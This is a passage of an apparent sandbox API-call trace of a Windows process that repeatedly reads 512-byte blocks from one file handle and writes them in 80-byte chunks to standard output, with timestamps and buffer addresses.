lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.368] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.368] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.368] GetFileType (hFile=0x4c) returned 0x1 [0111.368] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] GetFileType (hFile=0x4c) returned 0x1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.369] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.369] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.369] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.369] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] GetFileType (hFile=0x4c) returned 0x1 [0111.370] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.370] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.370] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.370] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.371] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] GetFileType (hFile=0x4c) returned 0x1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.371] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.371] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.372] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.372] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.372] GetFileType (hFile=0x4c) returned 0x1 [0111.372] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.373] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.373] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.373] GetFileType (hFile=0x4c) returned 0x1 [0111.373] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.374] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.374] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.374] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.374] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.375] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.375] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.375] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.375] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] GetFileType (hFile=0x4c) returned 0x1 [0111.376] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.376] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.376] _get_osfhandle (_FileHandle=1) returned 